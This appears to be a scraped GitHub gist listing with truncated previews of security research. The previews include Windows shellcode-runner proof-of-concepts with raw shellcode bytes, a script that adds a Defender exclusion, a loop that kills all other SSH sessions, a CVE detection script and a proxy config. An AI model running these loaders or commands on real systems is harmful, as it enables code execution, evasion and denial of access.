
@emdnaia
emdnaia / olecheck.py
Created January 29, 2026 17:21 — forked from decalage2/olecheck.py
olecheck - a simple script to identify potential CVE-2026-21509 samples
# script to scan MS Office files, looking for "Shell.Explorer" OLE objects which could match CVE-2026-21509
# using oletools - https://github.com/decalage2/oletools
# Philippe Lagadec 2026-01-28
# NOTES:
# According to the MS advisory https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
# the CVE-2026-21509 vulnerability is related to CLSID "EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B",
# corresponding to the "Shell.Explorer" COM object, which can be used to open the legacy
# Internet Explorer engine (aka Trident/MSHTML) from any application.
# So to exploit CVE-2026-21509 from a MS Office document, one could use either an OLE object
# ms-block.ps1 - Windows telemetry/AI blocker (idempotent, no dupes)
# Run as Administrator
$hostsPath = "$env:windir\System32\drivers\etc\hosts"
$marker = "# --- MS-BLOCK START ---"
$endMarker = "# --- MS-BLOCK END ---"
# Exclude hosts file from Defender
Add-MpPreference -ExclusionPath $hostsPath -ErrorAction SilentlyContinue
# Read current hosts, strip any previous MS-BLOCK section
/*
* Callback Chaining PoC - Windows API Callback Chain Execution
*/
#include <Windows.h>
#include <dbghelp.h>
#include <powrprof.h>
#include <stdio.h>
#pragma comment(lib, "user32.lib")

Psychological Manipulation Pipeline: A Scientifically Validated Framework

Context

Reference: https://x.com/Daractenus/status/2006666543669887158

This document analyzes the psychological mechanisms exploited in influence operations, with specific reference to AI-generated disinformation campaigns (e.g., Russian bot networks deploying AI-generated "Polish women" demanding EU exit). The framework synthesizes peer-reviewed research from cognitive psychology, social psychology, and behavioral science.


Phase 1: Target Identification & Profiling

@emdnaia
emdnaia / Stored_Procedure_Honeypot.md
Last active November 7, 2025 23:45
Stored_Procedure_Honeypot
/*
## File Descriptor INT_MAX Overflow
----
- Info:
Tweet: https://x.com/spendergrsec/status/1958264076162998771
Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370
@emdnaia
emdnaia / nossh.sh
Last active October 20, 2025 01:07
MY_TTY=$(tty | sed 's/\/dev\///')
MY_SESSION_PIDS=$(ps aux | grep "sshd-session.*$MY_TTY" | awk '{print $2}' | tr '\n' '|' | sed 's/|$//')
echo "Protecting PIDs: $MY_SESSION_PIDS"
while true; do
ps aux | grep 'sshd-session' | grep -v grep | grep -v '\[listener\]' | awk '{print $2}' | grep -vE "^($MY_SESSION_PIDS)$" | xargs -r kill -9 2>/dev/null
sleep 0.01 # Check every 10ms - way faster
done
@emdnaia
emdnaia / JasonToddIsTheBestRobin.c
Created September 25, 2025 17:25 — forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@emdnaia
emdnaia / enclave.c
Created August 3, 2025 22:56 — forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclave.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
stream {
map $ssl_preread_server_name $singbox {
trojan.example.com trojan;
trojan-ws.example.com trojan-ws;
trojan-ws-6.example.com trojan-ws-6;
vmess.example.com vmess;
vmess-ws.example.com vmess-ws;
vmess-ws-6.example.com vmess-ws-6;
}
upstream trojan {